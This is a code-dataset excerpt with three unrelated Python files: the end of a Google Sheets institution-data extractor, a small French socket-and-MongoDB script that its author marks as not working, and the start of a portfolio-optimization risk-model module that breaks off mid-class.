create_institution_sub_category(\n sheet_data.meta_data.get(InstitutionField.sub_category)\n ),\n \"childs\": [\n {\n VariableField.heading: variable_row[0],\n VariableField.name: variable_row[1],\n VariableField.sigla_answer: variable_row[2],\n VariableField.orig_text: variable_row[3],\n VariableField.source: variable_row[4],\n VariableField.variable_index: i,\n VariableField.type: VariableType.standard,\n }\n for i, variable_row in enumerate(sheet_data.data[1:])\n ],\n }\n log.info(f\"Found 1 institution from {sheet_data.sheet_title}\")\n return [institution]\n except IndexError:\n log.info(\"=*80\")\n log.error(sheet_data.sheet_title)\n\n\ndef _get_standard_institution(\n sheet_data: SheetData,\n) -> List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]:\n \"\"\"\n Get the list of institutions and their variables from a sheet.\n\n Parameters\n ----------\n sheet_data: SheetData\n The data of the sheet.\n\n Returns\n -------\n institutions: List[Dict[str, Union[str, List[Dict[str, Union[int, str]]]]]]\n The list of institutions and their variables.\n \"\"\"\n\n # Get the institution names from the first row of data\n institution_names = [\n institution_name for institution_name in sheet_data.data[0] if institution_name\n ]\n institutions = [\n {\n InstitutionField.spreadsheet_id: sheet_data.spreadsheet_id,\n InstitutionField.sheet_id: sheet_data.sheet_id,\n InstitutionField.name: institution_name,\n InstitutionField.category: sheet_data.meta_data.get(\n InstitutionField.category\n ),\n InstitutionField.sub_category: create_institution_sub_category(\n sheet_data.meta_data.get(InstitutionField.sub_category)\n ),\n \"childs\": [\n {\n VariableField.heading: variable_row[0],\n VariableField.name: variable_row[1],\n VariableField.sigla_answer: variable_row[2 + i * 3],\n VariableField.orig_text: variable_row[2 + i * 3 + 1],\n VariableField.source: variable_row[2 + i * 3 + 2],\n VariableField.variable_index: j,\n VariableField.type: VariableType.standard,\n }\n # The variables starts in the 3rd row of data\n for j, variable_row in enumerate(sheet_data.data[2:])\n ],\n }\n for i, institution_name in enumerate(institution_names)\n ]\n\n has_country = InstitutionField.country in sheet_data.meta_data\n for institution in institutions:\n if has_country:\n institution[InstitutionField.country] = sheet_data.meta_data.get(\n InstitutionField.country\n )\n\n log.info(\n f\"Found {len(institutions)} institutions from sheet {sheet_data.sheet_title}\"\n )\n return institutions\n\n\nclass A1Notation(NamedTuple):\n \"\"\"\n A1 notation refers to a group of cells within a bounding rectangle in a sheet.\n This doesn't capture all possible A1 notations because start_row and end_row are required,\n but they don't have to be.\n\n Attributes:\n sheet_id: str\n The id of the sheet that contains a group cells\n sheet_title: str\n The title of the sheet that contains a group of cells.\n start_row: int\n The top row boundary of a group of cells.\n end_row: int\n The bottom row boundary of a group of cells.\n start_column: Optional[str] = None\n The left column boundary of a group of cells.\n end_column: Optional[str] = None\n The right column boundary of a group of cells\n \"\"\"\n\n sheet_id: str\n sheet_title: str\n start_row: int\n end_row: int\n start_column: Optional[str] = None\n end_column: Optional[str] = None\n\n def raise_for_validity(self) -> None:\n \"\"\"\n Raise an error if the a1 notation is invalid.\n https://developers.google.com/sheets/api/guides/concepts#a1_notation\n\n For a description of an A1 notation, please view the A1Notation class attributes.\n \"\"\"\n\n if int(self.start_row) > int(self.end_row):\n # Start row is greater than end row\n raise exceptions.InvalidRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_row: self.start_row,\n MetaDataField.end_row: self.end_row,\n }\n )\n )\n elif self.start_column is not None and self.end_column is not None:\n # Start and end column are both present\n if len(self.start_column) > len(self.end_column):\n # Length of start column is greater than length end column\n raise exceptions.InvalidRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_column: self.start_column,\n MetaDataField.end_column: self.end_column,\n }\n )\n )\n elif len(self.start_column) == len(self.end_column):\n if self.start_column > self.end_column:\n # Start column is greater than end column\n raise exceptions.InvalidRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_column: self.start_column,\n MetaDataField.end_column: self.end_column,\n }\n )\n )\n elif any(field is not None for field in [self.start_column, self.end_column]):\n # Either start column or end column is present\n raise exceptions.IncompleteColumnRangeInA1Notation(\n ErrorInfo(\n {\n GoogleSheetsInfoField.sheet_id: self.sheet_id,\n GoogleSheetsInfoField.sheet_title: self.sheet_title,\n MetaDataField.start_column: self.start_column,\n MetaDataField.end_column: self.end_column,\n }\n )\n )\n\n def __str__(self) -> str:\n \"\"\"\n Returns str representation of the a1 notation.\n \"\"\"\n if self.start_column is not None and self.end_column is not None:\n return f\"'{self.sheet_title}'!{self.start_column}{self.start_row}:{self.end_column}{self.end_row}\"\n else:\n return f\"'{self.sheet_title}'!{self.start_row}:{self.end_row}\"\n\n\nclass GoogleSheetsInstitutionExtracter:\n google_sheets_format_to_function_dict = {\n gs_format.standard_institution: _get_standard_institution,\n gs_format.institution_and_composite_variable: _get_composite_variable,\n gs_format.composite_variable: _get_composite_variable,\n gs_format.multiple_sigla_answer_variable: _get_multilple_sigla_answer_variable,\n }\n\n def __init__(self, credentials_path: str):\n credentials_path = Path(credentials_path).resolve(strict=True)\n self._credentials_path = str(credentials_path)\n # Creates a Credentials instance from a service account json file.\n credentials = service_account.Credentials.from_service_account_file(\n self._credentials_path, scopes=GOOGLE_API_SCOPES\n )\n # Construct a Resource for interacting with Google Sheets API\n # `num_retries` downstreams\n # See https://github.com/googleapis/google-api-python-client/issues/1049#issuecomment-702893972\n service = build(\n \"sheets\",\n \"v4\",\n credentials=credentials,\n cache_discovery=False,\n num_retries=3,\n )\n # Store the spreadsheets service\n self.spreadsheets = service.spreadsheets()\n\n def _get_spreadsheet(self, spreadsheet_id: str) -> Any:\n \"\"\"\n Get the spreadsheet from a spreadsheet_id\n\n Parameters\n ----------\n spreadsheet_id: str\n The id of the spreadsheet\n\n Returns\n -------\n spreadsheet: The spreadsheet.\n See https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#Spreadsheet.\n\n \"\"\"\n # Get the spreadsheet\n return self.spreadsheets.get(spreadsheetId=spreadsheet_id).execute()\n\n def _get_spreadsheet_tile(self, spreadsheet: Any) -> str:\n \"\"\"Get the title of a spreadsheet\"\"\"\n return spreadsheet.get(\"properties\").get(\"title\")\n\n def _get_meta_data_a1_notations(\n self,\n spreadsheet: Any,\n ) -> List[A1Notation]:\n \"\"\"\n Construct an A1Notation for each sheet from its first two rows of meta data\n\n Parameters\n ----------\n spreadsheet: str\n The spreadsheet object.\n See https://developers.google.com/sheets/api/reference/rest/v4/spreadsheets#Spreadsheet\n\n Returns\n -------\n a1_notations: List[A1Notatoin]\n The list of A1Notations, one for each sheet.\n \"\"\"\n # Create an A1Notation for each sheet's meta data\n return [\n A1Notation(\n sheet_id=sheet.get(\"properties\").get(\"sheetId\"),\n sheet_title=sheet.get(\"properties\").get(\"title\"),\n start_row=1,\n end_row=2,\n )\n for sheet in spreadsheet.get(\"sheets\")\n ]\n\n def _get_meta_data(\n self, spreadsheet_id: str, a1_notations: List[A1Notation]\n ) -> List[Dict[str, str]]:\n \"Get the rows specified by the a1 notations\"\n # Get the meta data for each sheet\n meta_data_response = (\n self.spreadsheets.values()\n .batchGet(\n spreadsheetId=spreadsheet_id,\n ranges=[str(a1_notation) for a1_notation in a1_notations],\n majorDimension=\"COLUMNS\",\n )\n .execute()\n )\n # Get data within a range (specified by an a1 notation) for each sheet\n meta_data_value_ranges = meta_data_response.get(\"valueRanges\")\n # print(meta_data_value_ranges)\n # Create the meta datum for each sheet\n meta_data = [\n {value[0].strip(): value[1].strip() for value in value_range.get(\"values\")}\n for value_range in meta_data_value_ranges\n ]\n\n return meta_data\n\n def _get_data_a1_notations(\n self, a1_notations: List[A1Notation], meta_data: List[Dict[str, str]]\n ) -> List[A1Notation]:\n # Use the meta datum to create an a1 notation to get the datum of each sheet\n bounding_box_a1_notations = [\n A1Notation(\n sheet_id=a1_notations[i].sheet_id,\n sheet_title=a1_notations[i].sheet_title,\n start_row=int(meta_datum.get(MetaDataField.start_row)),\n end_row=int(meta_datum.get(MetaDataField.end_row)),\n start_column=meta_datum.get(MetaDataField.start_column),\n end_column=meta_datum.get(MetaDataField.end_column),\n )\n for i, meta_datum in enumerate(meta_data)\n ]\n\n for a1_anotation in bounding_box_a1_notations:\n a1_anotation.raise_for_validity()\n\n return bounding_box_a1_notations\n\n def _get_data(\n self, spreadsheet_id: str, a1_notations: List[A1Notation]\n ) -> List[List[List[Any]]]:\n data_response = (\n self.spreadsheets.values()\n .batchGet(\n spreadsheetId=spreadsheet_id,\n ranges=[str(a1_notation) for a1_notation in a1_notations],\n majorDimension=\"ROWS\",\n )\n .execute()\n )\n data = [\n value_range.get(\"values\")\n for value_range in data_response.get(\"valueRanges\")\n ]\n\n return data\n\n def _get_next_uv_dates_a1_annotations(\n self, a1_notations: List[A1Notation], meta_data: List[Dict[str, str]]\n ) -> List[A1Notation]:\n # Create a1 notations to get next uv dates\n next_uv_date_a1_notations = [\n A1Notation(\n sheet_id=a1_notations[i].sheet_id,\n sheet_title=a1_notations[i].sheet_title,\n start_row=int(meta_datum.get(MetaDataField.start_row)),\n end_row=int(meta_datum.get(MetaDataField.end_row)),\n start_column=meta_datum.get(MetaDataField.date_of_next_uv_column),\n end_column=meta_datum.get(MetaDataField.date_of_next_uv_column),\n )\n for i, meta_datum in enumerate(meta_data)\n if meta_datum.get(MetaDataField.date_of_next_uv_column) is not None\n ]\n for a1_notation in next_uv_date_a1_notations:\n a1_notation.raise_for_validity()\n return next_uv_date_a1_notations\n\n def _get_next_uv_dates_data(\n self, spreadsheet_id: str, a1_notations: List[A1Notation]\n ) -> List[List[Any]]:\n if not a1_notations:\n return []\n\n next_uv_date_response = (\n self.spreadsheets.values()\n .batchGet(\n spreadsheetId=spreadsheet_id,\n ranges=[str(a1_notation) for a1_notation in a1_notations],\n majorDimension=\"COLUMNS\",\n )\n .execute()\n )\n next_uv_date_data = [\n value_range.get(\"values\")[0]\n for value_range in next_uv_date_response.get(\"valueRanges\") or []\n ]\n return next_uv_date_data\n\n def get_spreadsheet_data(self, spreadsheet_id: str) -> List[SheetData]:\n \"\"\"\n Get the spreadsheet data given a spreadsheet id.\n\n Parameters\n ----------\n spreadsheet_id: str\n The id of the spreadsheet.\n\n Returns\n -------\n spreadsheet_data: List[SheetData]\n The spreadsheet data. Please the SheetData class to view its attributes.\n \"\"\"\n try:\n spreadsheet = self._get_spreadsheet(spreadsheet_id=spreadsheet_id)\n # Get an A1Notation for each sheet's meta data\n meta_data_a1_notations = self._get_meta_data_a1_notations(\n spreadsheet=spreadsheet\n )\n # Get the spreadsheet title\n spreadsheet_title = self._get_spreadsheet_tile(spreadsheet=spreadsheet)\n # Get the meta data for each sheet\n meta_data = self._get_meta_data(\n spreadsheet_id=spreadsheet_id,\n a1_notations=meta_data_a1_notations,\n )\n # Use the meta datum to create an a1 notation to get the datum of each sheet\n bounding_box_a1_notations = self._get_data_a1_notations(\n a1_notations=meta_data_a1_notations,\n meta_data=meta_data,\n )\n # Get data within a range (specified by an a1 notation) for each sheet\n data = self._get_data(\n spreadsheet_id=spreadsheet_id,\n a1_notations=bounding_box_a1_notations,\n )\n\n # Create a1 notations to get next uv dates\n next_uv_date_a1_notations = self._get_next_uv_dates_a1_annotations(\n a1_notations=meta_data_a1_notations,\n meta_data=meta_data,\n )\n # Get the next uv dates\n next_uv_date_data = self._get_next_uv_dates_data(\n spreadsheet_id=spreadsheet_id, a1_notations=next_uv_date_a1_notations\n )\n except HttpError as http_error:\n raise exceptions.UnableToAccessSpreadsheet(\n ErrorInfo(\n {\n GoogleSheetsInfoField.spreadsheet_title: spreadsheet_title,\n \"reason\": f\"{http_error}\",\n }\n )\n )\n\n next_uv_date_data_iter = iter(next_uv_date_data)\n\n log.info(f\"Finished extracting spreadsheet {spreadsheet_title}\")\n log.info(f\"Found {len(meta_data)} sheets in spreadsheet {spreadsheet_title}\")\n return [\n SheetData(\n spreadsheet_id=spreadsheet_id,\n spreadsheet_title=spreadsheet_title,\n sheet_id=a1_notation.sheet_id,\n sheet_title=a1_notation.sheet_title,\n meta_data=meta_data[i],\n data=data[i],\n next_uv_dates=(\n next(next_uv_date_data_iter)\n if meta_data[i].get(MetaDataField.date_of_next_uv_column)\n is not None\n else None\n ),\n )\n for i, a1_notation in enumerate(meta_data_a1_notations)\n ]\n\n def get_spreadsheet_ids(self, master_spreadsheet_id: str) -> List[str]:\n \"\"\"\n Get the list of spreadsheet ids from a master spreadsheet.\n\n Parameters\n ----------\n master_spreadsheet_id: str\n The id of the master spreadsheet.\n\n Returns\n -------\n spreadsheet_ids: List[str]\n The list of spreadsheet ids.\n \"\"\"\n spreadsheet_data = self.get_spreadsheet_data(master_spreadsheet_id)\n\n # There is only sheet in the master spreadsheet.\n # All spreadsheet ids are in the first column.\n spreadsheet_ids = [row[0] for row in spreadsheet_data[0].data]\n # spreadsheet_ids = [row[0] for row in spreadsheet_data.data[0]]\n log.info(\n f\"Found {len(spreadsheet_ids)} spreadsheets from master spreadsheet {master_spreadsheet_id}\"\n )\n return spreadsheet_ids\n\n @staticmethod\n def process_sheet_data(sheet_data: SheetData) -> FormattedSheetData:\n \"\"\"\n Process a sheet to get its data in a format ready to consumed by DB.\n\n Parameters\n ----------\n sheet_data: SheetData\n The data of the sheet.\n\n Returns\n -------\n formatted_sheet_data: FormattedSheetData\n The data in reqired format.\n \"\"\"\n formatted_data = None\n get_data_key = sheet_data.meta_data.get(MetaDataField.format)\n\n if (\n get_data_key\n in GoogleSheetsInstitutionExtracter.google_sheets_format_to_function_dict\n ):\n get_data_function = (\n GoogleSheetsInstitutionExtracter.google_sheets_format_to_function_dict[\n get_data_key\n ]\n )\n try:\n formatted_data = get_data_function(sheet_data)\n except Exception:\n raise exceptions.UnableToCreateFormattedSheetData(\n ErrorInfo(\n {\n GoogleSheetsInfoField.spreadsheet_title: sheet_data.spreadsheet_title,\n GoogleSheetsInfoField.sheet_title: sheet_data.sheet_title,\n }\n )\n )\n else:\n raise exceptions.UnrecognizedGoogleSheetsFormat(\n ErrorInfo(\n {\n GoogleSheetsInfoField.spreadsheet_title: sheet_data.spreadsheet_title,\n GoogleSheetsInfoField.sheet_title: sheet_data.sheet_title,\n MetaDataField.format: sheet_data.meta_data.get(\n MetaDataField.format\n ),\n MetaDataField.data_type: sheet_data.meta_data.get(\n MetaDataField.data_type\n ),\n }\n )\n )\n\n return FormattedSheetData(\n spreadsheet_id=sheet_data.spreadsheet_id,\n spreadsheet_title=sheet_data.spreadsheet_title,\n sheet_id=sheet_data.sheet_id,\n sheet_title=sheet_data.sheet_title,\n meta_data=sheet_data.meta_data,\n formatted_data=formatted_data,\n )\n\n def __str__(self):\n return f\"<GoogleSheetsInstitutionExtracter [{self._credentials_path}]>\"\n\n def __repr__(self):\n return str(self)\n","repo_name":"SIGLA-GU/siglatools","sub_path":"siglatools/institution_extracters/google_sheets_institution_extracter.py","file_name":"google_sheets_institution_extracter.py","file_ext":"py","file_size_in_byte":23999,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"28250837394","text":"import socket\nimport json\nfrom pymongo import MongoClient\nfrom flask import *\n\n\n\nclient = MongoClient('Localhost', 27017)\nregister = client.a_verifier\n\n# le code ne fonctionne pas \n\n\ndef conect():\n # Créer un socket\n sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n # Adresse IP et port sur lesquels écouter\n host = '192.168...'\n port = 80\n # Lier le socket à l'adresse IP et au port\n sock.bind((host, port))\n # Écouter les connexions entrantes\n sock.listen(1)\n while True:\n # Accepter une connexion entrante\n conn, addr = sock.accept()\n # Recevoir les données via le socket\n data = conn.recv(1024).decode()\n # Convertir la chaîne JSON en variable Python\n my_variable = json.loads(data)\n my_variable = str(my_variable)\n table = register.users.find_one({\"numid\": my_variable})\n print(table['nom'])\n return render_template(\"account.html\",userName = table['nom'])\n\n\n connect_user2(my_variable)\n # Fermer la connexion\n conn.close()\n # Fermer le socket\n sock.close()\n\nconect()","repo_name":"Krost1/End-of-bachelor-degree-project","sub_path":"Ultimated-Card-main/app/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"10528587465","text":"from .estimator import DataEstimator \nimport logging\nimport warnings\n\nimport scipy.linalg\n\nimport cvxpy as cp\nimport numpy as np\nimport pandas as pd\n\nfrom .costs import BaseCost\nfrom .forecast import HistoricalVariance, HistoricalFactorizedCovariance\n\nlogger = logging.getLogger(__name__)\n\n\n__all__ = [\n \"FullCovariance\",\n \"DiagonalCovariance\",\n \"FactorModelCovariance\",\n \"RiskForecastError\",\n \"WorstCaseRisk\",\n]\n\n\n\n\nclass BaseRiskModel(BaseCost):\n pass\n\n\n\n\nclass FullCovariance(BaseRiskModel):\n \"\"\"Quadratic risk model with full covariance matrix.\n \n :param Sigma: DataFrame of covariance matrices\n supplied by the user, or None if fitting from the past data.\n The DataFrame can either represents a single constant covariance matrix\n or one for each point in time.\n :type Sigma: pandas.DataFrame or None\n \n \n \"\"\"\n # r\"\"\"Quadratic risk model with full covariance matrix.\n #\n # This class represents the term :math:`\\Sigma_t`, *i.e.,*\n # the :math:`(n-1) \\times (n-1)` positive semi-definite matrix\n # which estimates the covariance of the (non-cash) assets' returns.\n # :ref:`Optimization-based policies` use this, as is explained\n # in Chapter 4 and 5 of the `book <https://web.stanford.edu/~boyd/papers/pdf/cvx_portfolio.pdf>`_.\n #\n # The user can either supply a :class:`pandas.DataFrame` with the covariance matrix\n # (constant or varying in time) computed externally (for example\n # with some machine learning technique) or let this class estimate the covariance from the data.\n # The latter is the default behavior.\n #\n # This class implements three ways to compute the covariance matrix from the past returns. The\n # computation is repeated at each point in time :math:`t` of a :class:`BackTest` using only\n # the past returns available at that point: :math:`r_{t-1}, r_{t-2}, \\ldots`.\n #\n # * *rolling covariance*, using :class:`pandas.DataFrame.rolling.cov`. This is done\n # if the user specifies the ``rolling`` argument.\n # * *exponential moving window covariance*, using :class:`pandas.DataFrame.ewm.cov`. This is done\n # if the user specifies the ``halflife`` argument (``rolling`` takes precedence).\n # * *full historical covariance*, using :class:`pandas.DataFrame.cov`. This is the default\n # behavior if no arguments are specified.\n #\n # If there are missing data in the historical returns the estimated covariance may not\n # be positive semi-definite. We correct it by projecting on the positive semi-definite\n # cone (*i.e.*, we set the negative eigenvalues of the resulting :math:`\\Sigma_t` to zero).\n #\n # :param Sigma: :class:`pandas.DataFrame` of covariance matrices\n # supplied by the user. The DataFrame either represents a single (constant) covariance matrix\n # or one for each point in time. In the latter case the DataFrame must have a :class:`pandas.MultiIndex`\n # where the first level is a :class:`pandas.DatetimeIndex`. If ``None`` (the default)\n # the covariance matrix is computed from past returns.\n # :type Sigma: pandas.DataFrame or None\n # :param rolling: if it is not ``None`` the covariance matrix will be estimated\n # on a rolling window of size ``rolling`` of the past returns.\n # :type rolling: int or None\n # :param halflife: if it is not ``None`` the covariance matrix will be estimated\n # on an exponential moving window of the past returns with half-life ``halflife``.\n # If ``rolling`` is specified it takes precedence over ``halflife``. If both are ``None`` the full history\n # will be used for estimation.\n # :type halflife: int or None\n # :param kappa: the multiplier for the associated forecast error risk\n # (see pages 32-33 of the `book <https://web.stanford.edu/~boyd/papers/pdf/cvx_portfolio.pdf>`_).\n # If ``float`` a passed it is treated as a constant, if ``pandas.Series`` with ``pandas.DateTime`` index\n # it varies in time, if ``None`` the forecast error risk term will not be compiled.\n # :type kappa: float or pandas.Series or None\n # :param kelly: correct the covariance matrix with the term :math:`\\mu\\mu^T`, as is explained\n # in page 28 of the `book <https://web.stanford.edu/~boyd/papers/pdf/cvx_portfolio.pdf>`_,\n # to match the second term of the Taylor expansion of the portfolio log-return. Default\n # is ``False``, corresponding to classical mean-variance optimization. If ``True``, it\n # estimates :math:`\\mu` with the same technique as :math:`\\Sigma`, *i.e.*, with rolling window\n # average, exponential moving window average, or an average of the full history.\n # :type kelly: bool\n # \"\"\"\n\n def __init__(self, Sigma=None, kelly=True):\n\n if not Sigma is None:\n self.Sigma = DataEstimator(Sigma)\n self.alreadyfactorized = False\n else:\n self.Sigma = HistoricalFactorizedCovariance(kelly=kelly) \n self.alreadyfactorized = True\n \n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n \n self.Sigma_sqrt = cp.Parameter((len(universe)-1, len(universe)-1))\n\n def values_in_time(self, t, past_returns, **kwargs):\n \"\"\"Update forecast error risk here, and take square root of Sigma.\"\"\"\n super().values_in_time(t=t, past_returns=past_returns, **kwargs)\n \n if self.alreadyfactorized:\n self.Sigma_sqrt.value = self.Sigma.current_value\n else:\n Sigma = self.Sigma.current_value\n eigval, eigvec = np.linalg.eigh(Sigma)\n eigval = np.maximum(eigval, 0.)\n self.Sigma_sqrt.value = eigvec @ np.diag(np.sqrt(eigval))\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n self.cvxpy_expression = cp.sum_squares(self.Sigma_sqrt.T @ w_plus_minus_w_bm[:-1])\n return self.cvxpy_expression\n\nclass RiskForecastError(BaseRiskModel):\n \"\"\"Risk forecast error. \n \n Implements the model defined in page 31 of the book. Takes same arguments\n as :class:`DiagonalCovariance`.\n \n :param sigma_squares: per-stock variances, indexed by time if DataFrame.\n If None it will be fitted on past data.\n :type sigma_squares: pd.DataFrame or pd.Series or None\n \"\"\"\n\n def __init__(self, sigma_squares=None):\n if sigma_squares is None:\n self.sigma_squares = HistoricalVariance(kelly=True) #None None\n else:\n self.sigma_squares = DataEstimator(sigma_squares)\n # self.standard_deviations = ParameterEstimator(standard_deviations)\n # self.zeroforcash=True\n # self.kelly=True\n \n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n self.sigmas_parameter = cp.Parameter(len(universe)-1, nonneg=True)#+self.kelly))\n\n def values_in_time(self, t, past_returns, **kwargs):\n \"\"\"Update forecast error risk here, and take square root of Sigma.\"\"\"\n super().values_in_time(t=t, past_returns=past_returns)\n \n # if self.sigma_squares is None:\n # sigma_squares = past_returns.var(ddof=0)\n # if self.kelly:\n # mean = past_returns.mean()\n # sigma_squares += mean**2\n # if self.zeroforcash:\n # sigma_squares.iloc[-1] = 0.\n # sigma_squares = sigma_squares.values\n # else:\n # sigma_squares = self.sigma_squares.current_value\n \n sigma_squares = self.sigma_squares.current_value\n \n self.sigmas_parameter.value = np.sqrt(sigma_squares)\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n\n return cp.square(cp.abs(w_plus_minus_w_bm[:-1]).T @ self.sigmas_parameter)\n \n\nclass DiagonalCovariance(BaseRiskModel):\n \"\"\"Diagonal covariance matrix, user-provided or fit from data.\n\n :param sigma_squares: per-stock variances, indexed by time if DataFrame.\n If None it will be fitted on past data.\n :type sigma_squares: pd.DataFrame or pd.Series or None \n \"\"\"\n\n def __init__(self, sigma_squares=None):\n if not sigma_squares is None:\n self.sigma_squares = DataEstimator(sigma_squares)\n else:\n self.sigma_squares = HistoricalVariance(kelly=True) #None\n #self.zeroforcash = True\n #self.kelly = True\n # self.standard_deviations = ParameterEstimator(standard_deviations)\n \n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n self.sigmas_parameter = cp.Parameter(len(universe)-1) #+self.kelly))\n\n def values_in_time(self, t, past_returns, **kwargs):\n \"\"\"Update forecast error risk here, and take square root of Sigma.\"\"\"\n #super().values_in_time(t, current_weights, current_portfolio_value, past_returns, past_volumes, **kwargs)\n super().values_in_time(t=t, past_returns=past_returns, **kwargs)\n \n # if self.sigma_squares is None:\n # sigma_squares = past_returns.var(ddof=0)\n # if self.kelly:\n # mean = past_returns.mean()\n # sigma_squares += mean**2\n # if self.zeroforcash:\n # sigma_squares[-1] = 0.\n # sigma_squares = sigma_squares.values\n # else:\n # sigma_squares = self.sigma_squares.current_value\n \n sigma_squares = self.sigma_squares.current_value\n\n self.sigmas_parameter.value = np.sqrt(sigma_squares)\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n\n return cp.sum_squares(cp.multiply(w_plus_minus_w_bm[:-1], self.sigmas_parameter))\n\n\nclass FactorModelCovariance(BaseRiskModel):\n \"\"\"Factor model covariance, either user-provided or fitted from the data.\n \n It has the structure\n \n :math:`F F^T + \\mathbf{diag}(d)`\n \n where :math:`F` is a *tall* matrix (many more rows than columns) and the vector\n :math:`d` is all non-negative. \n \n :param F: exposure matrices either constant or varying in time; if so, use a pandas multiindexed\n dataframe. If None it will be fitted.\n :type F: pd.DataFrame or None\n :param d: idyosyncratic variances either constant or varying in time; If None it will be fitted.\n :type d: pd.Series or pd.DataFrame or None\n :param num_factors: number of factors (columns of F), used if fitting the model\n :type num_factors: int \n \"\"\"\n\n # Args:\n # exposures (pd.DataFrame): constant factor exposure matrix or a dataframe\n # where the first index is time.\n # idyosync (pd.DataFrame or pd.Series): idyosyncratic variances for the symbol,\n # either fixed (pd.Series) or through time (pd.DataFrame).\n # factor_Sigma (pd.DataFrame or None): a constant factor covariance matrix\n # or a DataFrame with multiindex where the first index is time. If None,\n # the default, it is understood that the factor covariance is the identity.\n # (Otherwise we compute its matrix square root at each step internally and\n # apply it to the exposures).\n # forecast_error_kappa (float or pd.Series): uncertainty on the\n # assets' correlations. See the paper, pages 32-33.\n\n # \"\"\"\n\n factor_Sigma = None\n\n def __init__(self, F=None, d=None, num_factors=1, kelly=True):#, normalize=False):\n self.F = F if F is None else DataEstimator(F, compile_parameter=True) \n self.d = d if d is None else DataEstimator(d) \n if (self.F is None) or (self.d is None):\n self.fit = True\n self.Sigma = HistoricalFactorizedCovariance(kelly=kelly) #Sigma\n else:\n self.fit = False\n self.num_factors = num_factors\n # self.kelly = True\n # self.zeroforcash = True\n # self.normalize = normalize\n\n # @staticmethod\n # def build_low_rank_model(rets, num_factors=10, iters=10, normalize=True, shrink=True):\n # r\"\"\"Build a low rank risk model from past returns that include NaNs.\n #\n # This is an experimental procedure that may work well on past returns\n # matrices with few NaN values (say, below 20% of the total entries).\n # If there are (many) NaNs, one should probably also use a rather\n # large risk forecast error.\n # \"\"\"\n # # rets = past_returns.iloc[:,:-1] # drop cash\n # nan_fraction = rets.isnull().sum().sum() / np.prod(rets.shape)\n # normalizer = np.sqrt((rets**2).mean())\n # if normalize:\n # normalized = rets/(normalizer + 1E-8)\n # else:\n # normalized = rets\n # if nan_fraction:\n # if nan_fraction > 0.1 and not shrink:\n # warnings.warn(\"Low rank model estimation on past returns with many NaNs should use the `shrink` option\")\n # nan_implicit_imputation = pd.DataFrame(0., columns=normalized.columns, index = normalized.index)\n # for i in range(iters):\n # u, s, v = np.linalg.svd(normalized.fillna(nan_implicit_imputation), full_matrices=False)\n # nan_implicit_imputation = pd.DataFrame(\n # (u[:, :num_factors] * (s[:num_factors] - s[num_factors] * shrink)) @ v[:num_factors],\n # columns = normalized.columns, index = normalized.index)\n # else:\n # u, s, v = np.linalg.svd(normalized, full_matrices=False)\n # F = v[:num_factors].T * s[:num_factors] / np.sqrt(len(rets))\n # if normalize:\n # F = pd.DataFrame(F.T * (normalizer.values + 1E-8), columns=normalizer.index)\n # else:\n # F = pd.DataFrame(F.T, columns=normalizer.index)\n # idyosyncratic = normalizer**2 - (F**2).sum(0)\n # if not np.all(idyosyncratic >= 0.):\n # raise ForeCastError(\"Low rank risk estimation with iterative SVD did not work.\")\n # return F, idyosyncratic\n\n def pre_evaluation(self, universe, backtest_times):\n super().pre_evaluation(universe, backtest_times)\n # super().pre_evaluation(returns, volumes, start_time, end_time, **kwargs)\n self.idyosync_sqrt_parameter = cp.Parameter(len(universe)-1)\n self.F_parameter = cp.Parameter((self.num_factors, len(universe)-1)) if self.F is None else self.F.parameter\n # if not (self.factor_Sigma is None):\n # self.factor_Sigma_sqrt = cp.Parameter(self.factor_Sigma.shape, PSD=True)\n # self.forecast_error_penalizer = cp.Parameter(returns.shape[1], nonneg=True)\n\n def values_in_time(self, t, past_returns, **kwargs):\n super().values_in_time(t=t, past_returns=past_returns, **kwargs)\n \n # if self.F is None:\n # if not self.kelly:\n # past_returns = past_returns - past_returns.mean()\n # if self.zeroforcash:\n # past_returns = pd.DataFrame(past_returns, copy=True)\n # past_returns.iloc[:, -1] = 0.\n # F, d = self.build_low_rank_model(past_returns, num_factors=self.num_factors, normalize=self.normalize)\n # self.F_parameter.value = F.values\n # d = d.values\n # else:\n # d = self.d.current_value\n if self.fit:\n Sigmasqrt = self.Sigma.current_value\n # numpy eigendecomposition has largest eigenvalues last\n self.F_parameter.value = Sigmasqrt[:, -self.num_factors:].T\n d = (Sigmasqrt[:, :-self.num_factors]**2).sum(1)\n else:\n d = self.d.current_value\n self.idyosync_sqrt_parameter.value = np.sqrt(d)\n\n\n def compile_to_cvxpy(self, w_plus, z, w_plus_minus_w_bm):\n self.expression = cp.sum_squares(cp.multiply(self.idyosync_sqrt_parameter, w_plus_minus_w_bm[:-1]))\n assert self.expression.is_dcp(dpp=True)\n\n self.expression += cp.sum_squares(self.F_parameter @ w_plus_minus_w_bm[:-1])\n assert self.expression.is_dcp(dpp=True)\n\n return self.expression\n \n\nclass WorstCaseRisk(BaseRiskModel):\n \"\"\"Select the most restrictive risk model for each value of the allocation vector.\n\n Given a list of risk models, penalize the portfolio allocation by the\n one with highest risk value at the solution point. If uncertain about\n which risk model to use this procedure can be an easy solution.\n\n :param riskmodels: risk model instances on which to compute the worst-case\n risk.\n :type riskmodels: list \n \"\"\"\n\n def 